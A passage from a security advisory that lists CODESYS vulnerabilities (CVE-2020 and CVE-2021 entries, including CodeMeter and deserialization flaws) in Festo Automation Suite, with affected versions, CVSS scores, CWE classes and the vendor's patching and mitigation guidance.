monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-269 Improper Privilege Management Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N CVE-2020-12069 In CODESYS V3 products in all versions prior V3.5.16.0 containing the CmpUserMgr, the CODESYS Control runtime system stores the online communication passwords using a weak hashing algorithm. This can be used by a local attacker with low privileges to gain full control of the device. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-916 Use of Password Hash With Insufficient Computational Effort Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2020-14509 Multiple memory corruption vulnerabilities exist in CodeMeter (All versions prior to 7.10) where the packet parser mechanism does not verify length fields. An attacker could send specially crafted packets to exploit these vulnerabilities. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-805 Buffer Access with Incorrect Length Value Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2020-14513 CodeMeter (All versions prior to 6.81) and the software using it may crash while processing a specifically crafted license file due to unverified length fields. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2020-14515 CodeMeter (All versions prior to 6.90 when using CmActLicense update files with CmActLicense Firm Code) has an issue in the license-file signature checking mechanism, which allows attackers to build arbitrary license files, including forging a valid license file as if it were a valid license file of an existing vendor. Only CmActLicense update files with CmActLicense Firm Code are affected. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-347 Improper Verification of Cryptographic Signature Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-14517 Protocol encryption can be easily broken for CodeMeter (All versions prior to 6.90 are affected, including Version 6.90 or newer only if CodeMeter Runtime is running as server) and the server accepts external connections, which may allow an attacker to remotely communicate with the CodeMeter API. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-326 Inadequate Encryption Strength Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2020-14519 This vulnerability allows an attacker to use the internal WebSockets API for CodeMeter (All versions prior to 7.00 are affected, including Version 7.0 or newer with the affected WebSockets API still enabled. This is especially relevant for systems or devices where a web browser is used to access a web server) via a specifically crafted Java Script payload, which may allow alteration or creation of license files for when combined with CVE-2020-14515. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-346 Origin Validation Error Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-15806 CODESYS Control runtime system before 3.5.16.10 allows Uncontrolled Memory Allocation. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2020-16233 An attacker could send a specially crafted packet that could have CodeMeter (All versions prior to 7.10) send back packets containing data from the heap. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-404 Improper Resource Shutdown or Release Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2020-7052 CODESYS Control V3, Gateway V3, and HMI V3 before 3.5.15.30 allow uncontrolled memory allocation which can result in a remote denial of service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2021-21863 A unsafe deserialization vulnerability exists in the ComponentModel Profile.FromFile() functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21864 A unsafe deserialization vulnerability exists in the ComponentModel ComponentManager.StartupCultureSettings functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-50 Path Equivalence: '//multiple/leading/slash' Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21865 A unsafe deserialization vulnerability exists in the PackageManagement.plugin ExtensionMethods.Clone() functionality of CODESYS GmbH CODESYS Development System 3.5.16. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2021-21866 A unsafe deserialization vulnerability exists in the ObjectManager.plugin ProfileInformation.ProfileData functionality of CODESYS GmbH CODESYS Development System 3.5.16 and 3.5.17. A specially crafted file can lead to arbitrary command execution. An attacker can provide a malicious file to trigger this vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-502 Deserialization of Untrusted Data Metrics CVSS Version Base Score Base Severity Vector String 